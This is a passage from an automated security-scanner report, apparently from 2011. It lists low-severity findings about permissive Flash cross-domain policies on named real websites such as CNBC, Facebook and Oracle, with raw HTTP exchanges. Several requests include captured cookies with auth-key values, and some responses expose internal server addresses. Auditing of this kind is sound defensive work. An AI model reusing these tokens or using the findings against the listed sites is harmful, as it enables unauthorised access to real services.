Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: rd.rlcdn.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Content-Length: 500
Last-Modified: Mon, 05 Sep 2011 19:31:28 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.casualcollective.com" />
<allow-access-from domain="*.tubemogul.com" />
<allow-access-from domain="*.inplay.tubemogul.com" />
<allow-access-from domain="*.grooveshark.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.adotube.com" />
...[SNIP]...

4.104. http://search.cnbc.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://search.cnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: search.cnbc.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:01 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Mon, 18 Oct 2010 20:53:56 GMT
ETag: "f5-492ea5fe9c100"
Accept-Ranges: bytes
Content-Type: application/xml
Via: 1.1 aicache6
Content-Length: 245
X-Aicache-OS: 64.210.194.246:80
Connection: Keep-Alive
Keep-Alive: max=20

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="www.cnbc.com" />
<allow-access-from domain="*.cnbc.com" />
<allow-access-from domain="www.msn.com" />
<allow-access-from domain="*.msn.com" />
...[SNIP]...

4.105. http://server.iad.liveperson.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: server.iad.liveperson.net

Response

HTTP/1.1 200 OK
Content-Length: 526
Content-Type: text/xml
Content-Location: http://server.iad.liveperson.net/crossdomain.xml
Last-Modified: Thu, 23 Oct 2008 22:13:48 GMT
Accept-Ranges: bytes
ETag: "076249f5c35c91:100b"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:32:31 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"
...[SNIP]...
<allow-access-from domain="*.neogames-tech.com" secure="false" />
...[SNIP]...
<allow-access-from domain="secure.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.qa.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.st.neogames-tech.com" secure="false"/>
...[SNIP]...

4.106. http://snas.nbcuni.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://snas.nbcuni.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: snas.nbcuni.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:29 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
Last-Modified: Fri, 17 Dec 2010 18:25:22 GMT
ETag: "2c9cd-58b-4979f4b136880"
Accept-Ranges: bytes
Content-Length: 1419
Cache-Control: max-age=10
Expires: Tue, 06 Sep 2011 15:00:39 GMT
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><allow-access-from domain="*.ivillage.com" /><allow-access-from domain="*.nbbcdev.com" /><allow-access-from domain="*.bravotv.com" /><allow-access-from domain="*.console.net" /><allow-access-from domain="*.digphilly.com"/><allow-access-from domain="*.nbc10rss.com"/><allow-access-from domain="*.nbc10.com"/><allow-access-from domain="*.scifi.com"/><allow-access-from domain="*.weatherplus.com" /><allow-access-from domain="*.nbcuxd.com" /><allow-access-from domain="vplayer-preview-dev.nbcuni.ge.com" /><allow-access-from domain="*.industrynext.com"/><allow-access-from domain="*.nbcuni.com"/><allow-access-from domain="widgets.nbcuni.com"/><allow-access-from domain="*.nbc.com"/><allow-access-from domain="*.thetonightshowwithconan.com"/><allow-access-from domain="*.tonightshowwithconanobrien.com"/><allow-access-from domain="*.thetonightshowwithconanobrien.com"/><allow-access-from domain="*.tonightshow.com" /><allow-access-from domain="*.tonightshowwithconan.com" /><allow-access-from domain="*.latenightwithjimmyfallon.com" /><allow-access-from domain="*.ingaylewetrust.com" /><allow-access-from domain="*.thejaylenoshow.com" /><allow-access-from domain="127.0.0.1"/><allow-access-from domain="localhost"/><allow-access-from domain="*.sudjam.com"/>
...[SNIP]...

4.107. https://support.oracle.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://support.oracle.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: support.oracle.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:11:15 GMT
Server: Oracle-Application-Server-11g
Last-Modified: Sat, 13 Aug 2011 04:17:35 GMT
ETag: "1827ecc-f6-4aa5b4f3d35c0"
Accept-Ranges: bytes
Content-Length: 246
Vary: Accept-Encoding
Cache-Control: no-store,max-age=0,must-revalidate
Keep-Alive: timeout=15, max=1799
Connection: close
Content-Type: application/xml
Content-Language: en

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.oracle.com" secure="true" />
<allow-http-request-headers-from domain="*.oracle.com" secure="true" headers="ORA_MOS_LOC
...[SNIP]...

4.108. http://symlookup.cnbc.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://symlookup.cnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.1
Host: symlookup.cnbc.com
Proxy-Connection: keep-alive
Referer: http://quote.cnbc.com/quoteproxy.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339024957; s_sq=%5B%5BB%5D%5D; __qseg=Q_D

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.27
Content-Type: application/xml
Content-Length: 299
X-Aicache-OS: 64.210.193.218:80
Expires: Tue, 06 Sep 2011 15:02:33 GMT
Date: Tue, 06 Sep 2011 14:57:09 GMT
Connection: close

<?xml version="1.0"?>
<!-- http://stage.ticker.cnbc.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="www.cnbc.com" />
<allow-access-from domain="*.cnbc.com" />
<allow-access-from domain="www.msn.com" />
<allow-access-from domain="*.msn.com" />
...[SNIP]...

4.109. http://videometa.cnbc.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://videometa.cnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.1
Host: videometa.cnbc.com
Proxy-Connection: keep-alive
Referer: http://quote.cnbc.com/quoteproxy.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; __qseg=Q_D; s_nr=1315338989816; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CNews%25257CAllT%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257B%252520cnbc_multionclick%252528%252527http%25253A//www.cnbc.com/%252527%252529%25253B%25257D%2526oidt%253D2%2526ot%253DDIV

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.27
Content-Type: application/xml
Content-Length: 462
X-Aicache-OS: 64.210.193.215:80
Cache-Control: max-age=600
Expires: Tue, 06 Sep 2011 15:06:36 GMT
Date: Tue, 06 Sep 2011 14:56:36 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="www.cnbc.com" />
<allow-access-from domain="*.cnbc.com" />
<allow-access-from domain="www.msn.com" />
<allow-access-from domain="*.msn.com" />
<allow-access-from domain="video.nbcuni.com" />
<allow-access-from domain="*.video.nbcuni.com" />
<allow-access-from domain="widgets.nbcuni.com" />
<allow-access-from domain="*.widgets.nbcuni.com" />
...[SNIP]...

4.110. http://w.sharethis.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://w.sharethis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: w.sharethis.com

Response

HTTP/1.0 200 OK
Server: nginx/0.8.53
Content-Type: text/xml
Content-Length: 330
Last-Modified: Mon, 29 Aug 2011 16:55:44 GMT
Accept-Ranges: bytes
Date: Tue, 06 Sep 2011 16:46:55 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.meandmybadself.com" />
<allow-access-from domain="*.sharethis.com" />
...[SNIP]...

4.111. http://wd.sharethis.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://wd.sharethis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: wd.sharethis.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Tue, 06 Sep 2011 15:32:10 GMT
Content-Type: text/xml
Content-Length: 330
Last-Modified: Mon, 29 Aug 2011 16:55:44 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.meandmybadself.com" />
<allow-access-from domain="*.sharethis.com" />
...[SNIP]...

4.112. http://www.apture.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.apture.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.apture.com

Response

HTTP/1.0 200 OK
Last-Modified: Sat, 03 Sep 2011 01:16:29 GMT
Content-Length: 366
Content-Type: text/xml
P3p: CP="NON CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa HISa OUR LEG UNI COM NAV INT"
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:33:01 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.apture.com" />
<allow-access-from domain="*.sharlinx.com" />
<allow-access-from domain="apture.com" />
<allow-access-from domain="sharlinx.com" />
...[SNIP]...

4.113. http://www.atg.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.atg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.atg.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 19 Jul 2010 15:33:33 GMT
ETag: "6009a-128-48bbf4a92ed40"
Pragma: no-cache
Content-Type: text/xml
Cache-Control: private, no-cache, no-store, no-transform, proxy-revalidate
Date: Tue, 06 Sep 2011 15:32:21 GMT
Content-Length: 296
Connection: close

<?xml version="1.0" ?>
<!-- http://www.atg.com/crossdomain.xml -->
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*.atg.com"/>
<
...[SNIP]...

4.114. https://www.atg.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.atg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.atg.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 19 Jul 2010 15:33:33 GMT
ETag: "6009a-128-48bbf4a92ed40"
Pragma: no-cache
Content-Type: text/xml
Cache-Control: private, no-cache, no-store, no-transform, proxy-revalidate
Date: Tue, 06 Sep 2011 15:37:32 GMT
Content-Length: 296
Connection: close

<?xml version="1.0" ?>
<!-- http://www.atg.com/crossdomain.xml -->
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*.atg.com"/>
<
...[SNIP]...

4.115. http://www.cnbc.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.1
Host: www.cnbc.com
Proxy-Connection: keep-alive
Referer: http://media.cnbc.com/i/CNBC/Components/Promos/_app/promoBox_noBevelAuto.swf?delay=0&config=24596694&v=8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TZM=-300; __qca=P0-1380789371-1315338919989; snas_noinfo=1; cnbc_regional_cookie=US; xaikeeperua=yes; cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcZRSv7js4augxEbn8T3e084iWrP3zZjGLW8rjUsginb4%3d; cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7FjEBYL11GHn8=; s_cc=true; s_sq=%5B%5BB%5D%5D; adops_master_kvs=; s_nr=1315339005443; __qseg=Q_D

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 14:56:55 GMT
Via: 1.1 C aicache6
Content-Length: 3839
X-Aicache-OS: 65.55.53.237:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Tue, 06 Sep 2011 14:57:55 GMT

<?xml version="1.0"?>
<!-- http://www.msnbc.com/crossdomain.xml -->
<cross-domain-policy>
   <allow-access-from domain="nbcsports.com" />
   <allow-access-from domain="nbcsports.msnbc.com" />
   <allow-access-from domain="*.nbcsports.com" />
   <allow-access-from domain="*.nbcsports.msnbc.com" />
   <allow-access-from domain="*.msnbc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msnbc.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.ivillage.com " />
   <allow-access-from domain="i.ivillage.com" />
   <allow-access-from domain="devi.ivillage.com" />
   <allow-access-from domain="*.nbcuni.com " />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="msnbc-xpress" />
...[SNIP]...
<allow-access-from domain="*.cnbc.com"/>
   <allow-access-from domain="widgets.nbcuni.com"/>
   <allow-access-from domain="*.thenbcagency.com"/>
   <allow-access-from domain="*.veoh.com"/>
   <allow-access-from domain="*.imeem.com"/>
   <allow-access-from domain="*.livejournal.com"/>
   <allow-access-from domain="*.vox.com"/>
   <allow-access-from domain="*.sixapart.com"/>
   <allow-access-from domain="*.reuters.com"/>
   <allow-access-from domain="*.real.com"/>
   <allow-access-from domain="*.akamai.net"/>
   <allow-access-from domain="*.atlasrichmedia.co.au"/>
   <allow-access-from domain="*.atlasrichmedia.co.uk"/>
   <allow-access-from domain="*.atlasrichmedia.com"/>
   <allow-access-from domain="*.atdmt.com"/>
   <allow-access-from domain="*.eyeblasterwiz.com"/>
   <allow-access-from domain="*.serving-sys.com"/>
   <allow-access-from domain="*.Abc.com"/>
   <allow-access-from domain="*.Abcnews.com"/>
   <allow-access-from domain="*.Accuweather.com"/>
   <allow-access-from domain="*.Cbs.com"/>
   <allow-access-from domain="*.cbsnews.com"/>
   <allow-access-from domain="*.discovery.com"/>
   <allow-access-from domain="*.ew.com"/>
   <allow-access-from domain="*.fox.com"/>
   <allow-access-from domain="*.foxnews.com"/>
   <allow-access-from domain="*.ign.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.tvguide.com"/>
   <allow-access-from domain="*.weather.com"/>
   <allow-access-from domain="*.vh1.com"/>
   <allow-access-from domain="*.usatoday.com"/>
   <allow-access-from domain="*.bmg.com"/>
   <allow-access-from domain="*.bmgmusic.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.fluid.nl"/>
   <allow-access-from domain="*.myspace.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
   <allow-access-from domain="*.newsvine.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="64.207.156.207"/>
   <allow-access-from domain="*.msnbcmedia.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbcmedia.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-msn.com" />
   <allow-access-from domain="*.telemundo.com" />
<allow-access-from domain="*.unicornmedia.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.intellitxt.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="*.unicornmedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornapp.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornmediabeta.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="today.com" />
<allow-access-from domain="*.today.com" />
<allow-access-from domain="*.pointroll.net" />
<allow-access-from domain="*.imwx.com" />
...[SNIP]...

4.116. http://www.csc.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.csc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.csc.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:57:42 GMT
Server: Apache
Last-Modified: Thu, 03 Jun 2010 17:38:44 GMT
Accept-Ranges: bytes
Content-Length: 256
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 15:57:42 GMT
Connection: close
Content-Type: application/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.csc.com" />
<allow-access-from domain="assets1.csc.com" />
...[SNIP]...

4.117. http://www.deloitte.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.deloitte.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.deloitte.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Sat, 09 Jul 2011 09:03:24 GMT
Accept-Ranges: bytes
ETag: "3d5248f173ecc1:e97"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:56:56 GMT
Content-Length: 195
Connection: close

...<cross-domain-policy>
   <allow-access-from domain="*.deloitte.com" />
   <allow-access-from domain="*.tohmatsu.com" />
   <allow-access-from domain="*.brightcove.com" />
</cross-domain-policy>

4.118. http://www.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.64.80.38
Connection: close
Content-Length: 1527

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

4.119. http://www.fetchback.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fetchback.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.fetchback.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:16 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 30 Apr 2010 21:39:42 GMT
Accept-Ranges: bytes
Content-Length: 328
Cache-Control: max-age=0
Expires: Tue, 06 Sep 2011 15:00:16 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<!-- Begin FetchBack Cross Domain Policy Entry -->
<allow-access-from domain="*.fetchback.com" to-ports="80" />
...[SNIP]...

4.120. http://www.marykay.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.marykay.com

Response

HTTP/1.1 200 OK
Content-Length: 142
Content-Type: text/xml
Last-Modified: Thu, 02 Jun 2011 09:18:10 GMT
Accept-Ranges: bytes
ETag: "33c39dfd521cc1:d826e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=964365EE47EE74B09594D9AC3B884E28; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:45 GMT
Connection: close
